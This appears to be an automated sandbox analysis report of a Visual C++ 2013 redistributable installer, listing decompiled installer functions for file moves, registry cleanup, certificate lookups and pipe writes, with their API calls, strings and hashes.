0x012a3e11
0x012a3e44
0x012a3e44
0x012a3e4a
0x012a3dfd
0x012a3d8a
0x00000000
0x012a3dae
0x012a3dae
0x012a3db4
0x012a3dbb
0x012a3dc3
0x012a3d6d
0x012a3e91
0x012a3e91
0x012a3e98

APIs

CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,?,?,?,?,?,?,00000001,00000000), ref: 012A3D22
CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF), ref: 012A3DA7

Strings

detect.cpp, xrefs: 012A3E02
Failed to initialize update bundle., xrefs: 012A3E3E
BA aborted detect forward compatible bundle., xrefs: 012A3E0C

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CompareString
String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$detect.cpp
API String ID: 1825529933-918857910
Opcode ID: 8e4494abe0930113c372b2182650f696c8d162d851a24cc6dcee5abc5ab97ce5
Instruction ID: c4f3fb23c3d4d694607f8db475563c627562d2022011876a4466159e9f02dfbf
Opcode Fuzzy Hash: 8e4494abe0930113c372b2182650f696c8d162d851a24cc6dcee5abc5ab97ce5
Instruction Fuzzy Hash: DA515C71920706FFDF25DF68CD81EAABBBAFF04710F504609F665A61A0C771A960CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012B5A70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B5A70(void* __ecx, WCHAR* _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _t15;
				signed int _t17;
				short _t20;
				signed int _t22;
				WCHAR* _t26;
				WCHAR* _t29;
				signed int _t31;
				WCHAR* _t35;

				_t35 = 0;
				_t31 = 0;
				_v8 = 0;
				if(_a12 != 0) {
					_v8 = 1;
				}
				if(_a16 != _t35) {
					_v8 = _v8 | 0x00000002;
				}
				_t26 = _a8;
				if(MoveFileExW(_a4, _t26, _v8) != 0) {
					L25:
					return _t31;
				} else {
					_t15 = GetLastError();
					if(_a12 != _t35 || _t15 != 0x50 && _t15 != 0xb7) {
						if(_t15 != 3) {
							if(_t15 > _t35) {
								_t15 = _t15 & 0x0000ffff | 0x80070000;
							}
							_t31 = _t15;
							goto L25;
						}
						_t17 =  *_t26 & 0x0000ffff;
						_t29 = _t26;
						if(_t17 == 0) {
							L21:
							_t31 = 0x80070003;
							goto L25;
						} else {
							goto L11;
						}
						do {
							L11:
							if(_t17 == 0x5c) {
								_t35 = _t29;
							}
							_t29 =  &(_t29[1]);
							_t17 =  *_t29 & 0x0000ffff;
						} while (_t17 != 0);
						if(_t35 == 0) {
							goto L21;
						}
						 *_t35 = 0;
						_t31 = E012B65D3(_t26, 0);
						_t20 = 0x5c;
						 *_t35 = _t20;
						if(_t31 >= 0 && MoveFileExW(_a4, _t26, _v8) == 0) {
							_t22 = GetLastError();
							if(_t22 > 0) {
								_t22 = _t22 & 0x0000ffff | 0x80070000;
							}
							_t31 = _t22;
							if(_t31 < 0) {
								E012B294E(_t22, "fileutil.cpp", 0x424, _t31);
							}
						}
					} else {
						_t31 = 1;
					}
					goto L25;
				}
			}

0x012b5a76
0x012b5a79
0x012b5a7b
0x012b5a81
0x012b5a83
0x012b5a83
0x012b5a8d
0x012b5a8f
0x012b5a8f
0x012b5a96
0x012b5aa5
0x012b5b5c
0x012b5b62
0x012b5aab
0x012b5aab
0x012b5ab4
0x012b5acd
0x012b5b4e
0x012b5b55
0x012b5b55
0x012b5b5a
0x00000000
0x012b5b5a
0x012b5acf
0x012b5ad2
0x012b5ad7
0x012b5b45
0x012b5b45
0x00000000
0x00000000
0x00000000
0x00000000
0x012b5ad9
0x012b5ad9
0x012b5add
0x012b5adf
0x012b5adf
0x012b5ae1
0x012b5ae4
0x012b5ae7
0x012b5aee
0x00000000
0x00000000
0x012b5af4
0x012b5afc
0x012b5b00
0x012b5b01
0x012b5b06
0x012b5b19
0x012b5b21
0x012b5b28
0x012b5b28
0x012b5b2d
0x012b5b31
0x012b5b3e
0x012b5b3e
0x012b5b31
0x012b5ac2
0x012b5ac4
0x012b5ac4
0x00000000
0x012b5ab4

APIs

MoveFileExW.KERNEL32(00000003,00000001,000007D0,?,00000000,?,?,?,012B5B97,00000003,00000001,00000001,00000000,00000000,00000000), ref: 012B5A9D
GetLastError.KERNEL32(?,?,?,012B5B97,00000003,00000001,00000001,00000000,00000000,00000000,?,01297625,?,00000000,00000001,00000001), ref: 012B5AAB
MoveFileExW.KERNEL32(00000003,00000001,000007D0,00000001,00000000,?,?,?,012B5B97,00000003,00000001,00000001,00000000,00000000,00000000), ref: 012B5B0F
GetLastError.KERNEL32(?,?,?,012B5B97,00000003,00000001,00000001,00000000,00000000,00000000,?,01297625,?,00000000,00000001,00000001), ref: 012B5B19

Strings

fileutil.cpp, xrefs: 012B5B39

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorFileLastMove
String ID: fileutil.cpp
API String ID: 55378915-2967768451
Opcode ID: dfaed373498a1027550022e2b82ae0ac9fab0ef15adb844474f02b6004e79ce7
Instruction ID: 49276cc74b954259ab58030567b805b3cfa7d6d25dbd0ef81e3dcf5c1d38b6c6
Opcode Fuzzy Hash: dfaed373498a1027550022e2b82ae0ac9fab0ef15adb844474f02b6004e79ce7
Instruction Fuzzy Hash: 0821E531520317EBEF314E5998D4BFE7AA5EF407D0F24002AEA44EF145E675CD018B91

Uniqueness

Uniqueness Score: -1.00%

Function 012860CD Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86
registryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E012860CD(void* __eax, void* __ecx, void* __edx) {
				char _v8;
				int _v12;
				int _v16;
				int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t40;
				void* _t44;
				void* _t46;

				_t44 = __edx;
				_t41 = __ecx;
				_t46 = __eax;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 1;
				_t40 = E01285E2D(__ecx, __eax,  &_v8);
				if(_t40 >= 0) {
					if(E012B378B( *((intOrPtr*)(_t46 + 0x4c)), _v8, 1,  &_v12) < 0) {
						L8:
						_t40 = 0;
						if(_v20 != 0) {
							_t40 = E012B396D(_t41, _t44,  *((intOrPtr*)(_t46 + 0x4c)), _v8, 0, 0);
							if(_t40 != 0x80070002 && _t40 < 0) {
								E012AFA86(_t40, "Failed to remove update registration key: %ls", _v8);
							}
						}
						goto L12;
					}
					if(E012B31D0(_t40, 0, _t46, _v12, L"PackageVersion",  &_v16) >= 0 && CompareStringW(0x7f, 0, _v16, 0xffffffff,  *(_t46 + 0x64), 0xffffffff) != 2) {
						_v20 = 0;
					}
					if(_v12 != 0) {
						RegCloseKey(_v12);
						_v12 = 0;
					}
					goto L8;
				} else {
					_push("Failed to format key for update registration.");
					_push(_t40);
					E012AFA86();
					L12:
					if(_v8 != 0) {
						E012B01E8(_v8);
					}
					if(_v16 != 0) {
						E012B01E8(_v16);
					}
					return _t40;
				}
			}

0x012860cd
0x012860cd
0x012860d6
0x012860de
0x012860e1
0x012860e4
0x012860e7
0x012860f3
0x012860f7
0x0128611e
0x01286161
0x01286161
0x01286166
0x01286175
0x0128617d
0x0128618c
0x01286191
0x0128617d
0x00000000
0x01286166
0x01286133
0x0128614d
0x0128614d
0x01286153
0x01286158
0x0128615e
0x0128615e
0x00000000
0x012860f9
0x012860f9
0x012860fe
0x012860ff
0x01286194
0x01286197
0x0128619c
0x0128619c
0x012861a4
0x012861a9
0x012861a9
0x012861b4
0x012861b4

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,?,000000FF,012872B0,PackageVersion,?,?,00000001,00000001,012872B0,00000001,00020006,00000001), ref: 01286142
RegCloseKey.ADVAPI32(012872B0,012872B0,PackageVersion,?,?,00000001,00000001,012872B0,00000001,00020006,00000001,00000000), ref: 01286158

Strings

Failed to format key for update registration., xrefs: 012860F9
Failed to remove update registration key: %ls, xrefs: 01286186
PackageVersion, xrefs: 01286124

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseCompareString
String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
API String ID: 446873843-3222553582
Opcode ID: fdccd455ae968c19d2400797d34f89ef2c23a3397fdf582c50b702bf3fd2095b
Instruction ID: 6b82210c247b12f4d088b323600489b4cb5430e85a5d22b4096d0ebc765fce33
Opcode Fuzzy Hash: fdccd455ae968c19d2400797d34f89ef2c23a3397fdf582c50b702bf3fd2095b
Instruction Fuzzy Hash: 6221A171D2120AFFDF12ABD98CC59EEFFB9EF44751F200665E221A2292D7B25640DB10

Uniqueness

Uniqueness Score: -1.00%

Function 01285FE4 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E01285FE4(void* __ecx, void* __edx, intOrPtr* __edi, signed int _a4) {
				WCHAR* _v8;
				char _v12;
				char _v16;
				WCHAR* _v20;
				char* _t48;
				intOrPtr _t50;
				void* _t51;
				void* _t54;
				intOrPtr* _t55;
				WCHAR* _t56;

				_t55 = __edi;
				_t54 = __edx;
				_t51 = __ecx;
				_t56 = 0;
				asm("sbb eax, eax");
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t50 = E012B1FE9(__edi, ( ~_a4 & 0x00000007) + 0x1c,  &_v16);
				if(_t50 >= 0) {
					_v20 = 0;
					__eflags =  *((intOrPtr*)(__edi + 4));
					if( *((intOrPtr*)(__edi + 4)) > 0) {
						_a4 = 0;
						while(1) {
							_t58 =  *_t55 + _a4;
							_t50 = E012B201F(_t51, _t54, _v16,  *((intOrPtr*)( *_t55 + _a4 + 4)),  &_v8);
							__eflags = _t50;
							if(_t50 < 0) {
								break;
							}
							_t50 = E012B201F(_t51, _t54, _v8,  *_t58,  &_v12);
							__eflags = _t50;
							if(__eflags < 0) {
								break;
							} else {
								E012B5BBE(_t51, __eflags, _v12);
								RemoveDirectoryW(_v8);
								_v20 = _v20 + 1;
								_a4 = _a4 + 0xc;
								__eflags = _v20 -  *((intOrPtr*)(_t55 + 4));
								if(_v20 <  *((intOrPtr*)(_t55 + 4))) {
									continue;
								} else {
								}
							}
							L11:
							_t56 = 0;
							__eflags = 0;
							goto L12;
						}
						_push("Failed to allocate regid folder path.");
						_push(_t50);
						E012AFA86();
						goto L11;
					}
				} else {
					_t48 = "per-machine";
					if(_a4 == 0) {
						_t48 = "per-user";
					}
					E012AFA86(_t50, "Failed to find local %hs appdata directory.", _t48);
				}
				L12:
				if(_v12 != _t56) {
					E012B01E8(_v12);
				}
				if(_v8 != _t56) {
					E012B01E8(_v8);
				}
				if(_v16 != _t56) {
					E012B01E8(_v16);
				}
				return _t50;
			}

0x01285fe4
0x01285fe4
0x01285fe4
0x01285ff3
0x01285ff7
0x01286000
0x01286003
0x01286006
0x0128600e
0x01286012
0x01286034
0x01286037
0x0128603a
0x0128603c
0x0128603f
0x01286041
0x01286053
0x01286055
0x01286057
0x00000000
0x00000000
0x01286067
0x01286069
0x0128606b
0x00000000
0x0128606d
0x01286070
0x01286078
0x0128607e
0x01286084
0x01286088
0x0128608b
0x00000000
0x00000000
0x0128608d
0x0128608b
0x0128609c
0x0128609c
0x0128609c
0x00000000
0x0128609c
0x0128608f
0x01286094
0x01286095
0x00000000
0x0128609b
0x01286014
0x01286014
0x0128601c
0x0128601e
0x0128601e
0x0128602a
0x0128602f
0x0128609e
0x012860a1
0x012860a6
0x012860a6
0x012860ae
0x012860b3
0x012860b3
0x012860bb
0x012860c0
0x012860c0
0x012860ca

APIs

Part of subcall function 012B1FE9: SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,0129745F,-0000001C,00000000,00000000,?,?,01298DEB), ref: 012B200A

RemoveDirectoryW.KERNEL32(00000001,00000001,00000001,00000001,00000001,012872BD,?,00000001,-0000001B,012872BD,00000001,00000000,?,012872BD,00000001,00000001), ref: 01286078

Strings

Failed to find local %hs appdata directory., xrefs: 01286024
per-machine, xrefs: 01286014
per-user, xrefs: 0128601E, 01286023
Failed to allocate regid folder path., xrefs: 0128608F

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: DirectoryFolderPathRemove
String ID: Failed to allocate regid folder path.$Failed to find local %hs appdata directory.$per-machine$per-user
API String ID: 293476170-2037127396
Opcode ID: f34a49016e7391397add631a5da3649e90ae6bcaf0396e714b81dd0b7e795353
Instruction ID: 29bbda544c9fda14d2b177b6f558168454742b1e162ef99ee35e8382799dd153
Opcode Fuzzy Hash: f34a49016e7391397add631a5da3649e90ae6bcaf0396e714b81dd0b7e795353
Instruction Fuzzy Hash: 5C219E71D2121AFBCF12BFA8CC808EDBBB9FF24785B108066F504A6111D771AA91DB84

Uniqueness

Uniqueness Score: -1.00%

Function 012B75ED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E012B75ED(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, signed int* _a16) {
				signed int _v8;
				signed int* _t19;
				signed int _t22;
				signed int _t27;
				signed int _t31;
				intOrPtr _t36;
				intOrPtr* _t39;

				_t39 = __imp__CertGetCertificateContextProperty;
				_push( &_v8);
				_t31 = 0;
				_v8 = _v8 & 0;
				_push(0);
				_push(_a8);
				_push(_a4);
				if( *_t39() != 0) {
					_t36 = E012B233B(_v8, 1);
					if(_t36 != 0) {
						_push( &_v8);
						_push(_t36);
						_push(_a8);
						_push(_a4);
						if( *_t39() != 0) {
							 *_a12 = _t36;
							_t19 = _a16;
							_t36 = 0;
							if(_t19 == 0) {
								L18:
								L19:
								return _t31;
							}
							 *_t19 = _v8;
							L16:
							if(_t36 != 0) {
								E012B24F6(_t36);
							}
							goto L18;
						}
						_t22 = GetLastError();
						if(_t22 > 0) {
							_t22 = _t22 & 0x0000ffff | 0x80070000;
						}
						_t31 = _t22;
						if(_t31 >= 0) {
							_t31 = 0x80004005;
						}
						E012B294E(_t22, "certutil.cpp", 0x27, _t31);
						goto L16;
					}
					_t31 = 0x8007000e;
					E012B294E(0x8007000e, "certutil.cpp", 0x23, 0x8007000e);
					goto L18;
				}
				_t27 = GetLastError();
				if(_t27 > 0) {
					_t27 = _t27 & 0x0000ffff | 0x80070000;
				}
				_t31 = _t27;
				if(_t31 >= 0) {
					_t31 = 0x80004005;
				}
				E012B294E(_t27, "certutil.cpp", 0x1f, _t31);
				goto L19;
			}

0x012b75f3
0x012b75fc
0x012b75fd
0x012b75ff
0x012b7602
0x012b7603
0x012b7606
0x012b760d
0x012b764b
0x012b764f
0x012b766a
0x012b766b
0x012b766c
0x012b766f
0x012b7676
0x012b76a9
0x012b76ab
0x012b76ae
0x012b76b2
0x012b76c3
0x012b76c4
0x012b76c9
0x012b76c9
0x012b76b7
0x012b76b9
0x012b76bb
0x012b76be
0x012b76be
0x00000000
0x012b76bb
0x012b7678
0x012b7680
0x012b7687
0x012b7687
0x012b768c
0x012b7690
0x012b7692
0x012b7692
0x012b769f
0x00000000
0x012b769f
0x012b765e
0x012b7660
0x00000000
0x012b7660
0x012b760f
0x012b7617
0x012b761e
0x012b761e
0x012b7623
0x012b7627
0x012b7629
0x012b7629
0x012b7636
0x00000000

APIs

CertGetCertificateContextProperty.CRYPT32(?,012981B7,00000000,00000003), ref: 012B7609
GetLastError.KERNEL32(?,012981B7,?,00000003,00AAC56B,?), ref: 012B760F
CertGetCertificateContextProperty.CRYPT32(?,012981B7,00000000,00000003), ref: 012B7672
GetLastError.KERNEL32(?,012981B7,?,00000003,00AAC56B,?), ref: 012B7678

Strings

certutil.cpp, xrefs: 012B7631, 012B7659, 012B769A

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CertCertificateContextErrorLastProperty
String ID: certutil.cpp
API String ID: 980632616-2692845373
Opcode ID: 430c885457147df635d56d4adfa7ce39a99db19d18b78370d37481ad7cc4a43f
Instruction ID: 51761fbb601d736d92e22ded8baf17af73320fa442de6df25cda69ed15bd2df6
Opcode Fuzzy Hash: 430c885457147df635d56d4adfa7ce39a99db19d18b78370d37481ad7cc4a43f
Instruction Fuzzy Hash: C421B37176030BFFEB219A9DDCC5FBA3AA99F957D4F100035BA04EA290DAB5DE005760

Uniqueness

Uniqueness Score: -1.00%

Function 012B6B16 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E012B6B16(void* __ecx, WCHAR** _a4) {
				long _v8;
				long _v12;
				WCHAR* _t17;
				long _t20;
				signed int _t22;
				long _t27;
				WCHAR** _t29;
				long _t34;

				_t29 = _a4;
				_v8 = 0;
				_v12 = 0;
				if(_t29 == 0) {
					L4:
					_t17 = 0;
					goto L6;
				} else {
					_t26 =  *_t29;
					if( *_t29 == 0) {
						goto L4;
					} else {
						_t27 = E012B018E(_t26,  &_v12);
						_v8 = _t27;
						if(_t27 >= 0) {
							if(_v12 != 0) {
								_t17 =  *_t29;
							} else {
								goto L4;
							}
							L6:
							_t34 = GetCurrentDirectoryW(_v12, _t17);
							if(_t34 != 0) {
								if(_v12 < _t34) {
									_t20 = E012B00D8(_t29, _t34);
									_v8 = _t20;
									if(_t20 >= 0 && GetCurrentDirectoryW(_t34,  *_t29) == 0) {
										_t22 = GetLastError();
										if(_t22 > 0) {
											_t22 = _t22 & 0x0000ffff | 0x80070000;
										}
										_v8 = _t22;
										if(_t22 >= 0) {
											_v8 = 0x80004005;
										}
										_push(_v8);
										_push(0x179);
										goto L20;
									}
								}
							} else {
								_t22 = GetLastError();
								if(_t22 > 0) {
									_t22 = _t22 & 0x0000ffff | 0x80070000;
								}
								_v8 = _t22;
								if(_t22 >= 0) {
									_v8 = 0x80004005;
								}
								_push(_v8);
								_push(0x170);
								L20:
								_push("dirutil.cpp");
								E012B294E(_t22);
							}
						}
					}
				}
				return _v8;
			}

0x012b6b1c
0x012b6b22
0x012b6b25
0x012b6b2a
0x012b6b4c
0x012b6b4c
0x00000000
0x012b6b2c
0x012b6b2c
0x012b6b30
0x00000000
0x012b6b32
0x012b6b37
0x012b6b3c
0x012b6b41
0x012b6b4a
0x012b6b50
0x00000000
0x00000000
0x00000000
0x012b6b52
0x012b6b5f
0x012b6b63
0x012b6b94
0x012b6b98
0x012b6b9d
0x012b6ba2
0x012b6bad
0x012b6bb5
0x012b6bbc
0x012b6bbc
0x012b6bc1
0x012b6bc6
0x012b6bc8
0x012b6bc8
0x012b6bcf
0x012b6bd2
0x00000000
0x012b6bd2
0x012b6ba2
0x012b6b65
0x012b6b65
0x012b6b6d
0x012b6b74
0x012b6b74
0x012b6b79
0x012b6b7e
0x012b6b80
0x012b6b80
0x012b6b87
0x012b6b8a
0x012b6bd7
0x012b6bd7
0x012b6bdc
0x012b6bdc
0x012b6be1
0x012b6b41
0x012b6b30
0x012b6be8

APIs

GetCurrentDirectoryW.KERNEL32(?,00000000,00000001,00000009,00000000,?,?,?,01291F8D,00000001,00000000,Setup,00000000,log,0000000D,00000000), ref: 012B6B5D
GetLastError.KERNEL32(?,?,?,01291F8D,00000001,00000000,Setup,00000000,log,0000000D,00000000,00000000,?,?,?), ref: 012B6B65
GetCurrentDirectoryW.KERNEL32(00000000,?,?,00000000,?,?,?,01291F8D,00000001,00000000,Setup,00000000,log,0000000D,00000000,00000000), ref: 012B6BA7
GetLastError.KERNEL32(?,?,?,01291F8D,00000001,00000000,Setup,00000000,log,0000000D,00000000,00000000,?,?,?), ref: 012B6BAD

Strings

dirutil.cpp, xrefs: 012B6BD7

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CurrentDirectoryErrorLast
String ID: dirutil.cpp
API String ID: 152501406-2193988115
Opcode ID: c295d98064c523c98b0c03929a5a88abd22586cc122258728a5489c90ce20eaf
Instruction ID: 027e2e738361a8d044542c347c46e7197f2ef9068d44f469a2d3ddb5e47d440a
Opcode Fuzzy Hash: c295d98064c523c98b0c03929a5a88abd22586cc122258728a5489c90ce20eaf
Instruction Fuzzy Hash: BA213371A21217FBDB22DB99DDC5AEEBAB8EF15780F204469E600F7110F775DA009B90

Uniqueness

Uniqueness Score: -1.00%

Function 012A485C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E012A485C(void* __ebx, void* __eflags, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				void* _t46;
				signed int* _t47;
				signed int* _t53;
				intOrPtr _t55;
				signed int _t56;
				intOrPtr _t57;

				_t46 = __ebx;
				_v8 = _v8 & 0x00000000;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t56 =  *_a4;
				_t55 = E012B233B(_t56 << 2, 1);
				_t35 = 0;
				if(_t55 != 0) {
					_t47 = _a4;
					if( *_t47 > 0) {
						_t7 =  &(_t47[1]); // 0x1070005
						_t53 = _t7;
						do {
							 *(_t55 + _t35 * 4) = _t53;
							_t35 = _t35 + 1;
							_t53 =  &(_t53[0x83]);
						} while (_t35 <  *_t47);
					}
					_v24 = 3;
					_v20 = 2;
					_v16 = _t56;
					_v12 = _t55;
					_t57 = _a8( &_v24, _a12);
					WaitForSingleObject( *(_t46 + 0xc), 0xffffffff);
					 *( *((intOrPtr*)(_t46 + 0x10)) + 0x424) =  *( *((intOrPtr*)(_t46 + 0x10)) + 0x424) & 0x00000000;
					 *((intOrPtr*)( *((intOrPtr*)(_t46 + 0x10)) + 0x428)) = _t57;
					if(_t57 == 2) {
						 *((char*)( *((intOrPtr*)(_t46 + 0x10)) + 2)) = 1;
						 *((char*)( *((intOrPtr*)(_t46 + 0x10)) + 3)) = 1;
					}
					ReleaseMutex( *(_t46 + 0xc));
					SetEvent( *(_t46 + 8));
					E012B24F6(_t55);
				} else {
					_v8 = 0x8007000e;
					E012B294E(0, "NetFxChainer.cpp", 0xee, 0x8007000e);
					_push("Failed to allocate buffer.");
					_push(0x8007000e);
					E012AFA86();
				}
				return _v8;
			}

0x012a485c
0x012a4862
0x012a486d
0x012a486e
0x012a486f
0x012a4870
0x012a4874
0x012a4883
0x012a4885
0x012a4889
0x012a48b5
0x012a48ba
0x012a48bc
0x012a48bc
0x012a48bf
0x012a48bf
0x012a48c2
0x012a48c3
0x012a48c9
0x012a48bf
0x012a48d4
0x012a48db
0x012a48e2
0x012a48e5
0x012a48f0
0x012a48f2
0x012a48fb
0x012a4905
0x012a490e
0x012a4913
0x012a491a
0x012a491a
0x012a4921
0x012a492a
0x012a4931
0x012a488b
0x012a489b
0x012a489e
0x012a48a3
0x012a48a8
0x012a48a9
0x012a48af
0x012a493c

APIs

Part of subcall function 012B233B: GetProcessHeap.KERNEL32(?,00000000,?,01283087,?,00000000,?,?,?,00000000), ref: 012B234C
Part of subcall function 012B233B: RtlAllocateHeap.NTDLL(00000000,?,01283087,?,00000000,?,?,?,00000000), ref: 012B2353

WaitForSingleObject.KERNEL32(?,000000FF), ref: 012A48F2
ReleaseMutex.KERNEL32(?), ref: 012A4921
SetEvent.KERNEL32(?), ref: 012A492A

Strings

Failed to allocate buffer., xrefs: 012A48A3
NetFxChainer.cpp, xrefs: 012A4896

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
String ID: Failed to allocate buffer.$NetFxChainer.cpp
API String ID: 944053411-3611226795
Opcode ID: 5a43c51f073e2a551be2ed3012ab7b8315947027a46fc2c56782366f11daaca0
Instruction ID: 09c7e938d827b23b88f8da242d1ab034790564790c273bcccfc99993baa8aab2
Opcode Fuzzy Hash: 5a43c51f073e2a551be2ed3012ab7b8315947027a46fc2c56782366f11daaca0
Instruction Fuzzy Hash: EE210571910245EFDB11DF64C888A9EBBB1FF49324F148168E915AF245C7B5DA02CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01282F42 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 74
fileCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E01282F42(void* __ecx, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12, long _a16) {
				char _v8;
				struct _OVERLAPPED* _v12;
				signed int _t27;
				signed int _t33;
				void* _t44;

				_v12 = 0;
				_v8 = 0;
				_t33 = E01282EA6(_a8, _a12, _a16,  &_v12,  &_v8);
				if(_t33 >= 0) {
					_t44 = 0;
					_a16 = 0;
					if(_v8 > 0) {
						while(WriteFile(_a4, _v12, _v8 - _t44,  &_a16, 0) != 0) {
							_t44 = _t44 + _a16;
							if(_t44 < _v8) {
								continue;
							} else {
							}
							goto L11;
						}
						_t27 = GetLastError();
						if(_t27 > 0) {
							_t27 = _t27 & 0x0000ffff | 0x80070000;
						}
						_t33 = _t27;
						if(_t33 >= 0) {
							_t33 = 0x80004005;
						}
						E012B294E(_t27, "pipe.cpp", 0x309, _t33);
						_push("Failed to write message type to pipe.");
						_push(_t33);
						E012AFA86();
					}
					L11:
				} else {
					_push("Failed to allocate message to write.");
					_push(_t33);
					E012AFA86();
				}
				if(_v12 != 0) {
					E012B24F6(_v12);
				}
				return _t33;
			}

0x01282f59
0x01282f5f
0x01282f67
0x01282f6b
0x01282f7d
0x01282f7f
0x01282f85
0x01282f87
0x01282fa2
0x01282fa8
0x00000000
0x00000000
0x01282faa
0x00000000
0x01282fa8
0x01282fac
0x01282fb4
0x01282fbb
0x01282fbb
0x01282fc0
0x01282fc4
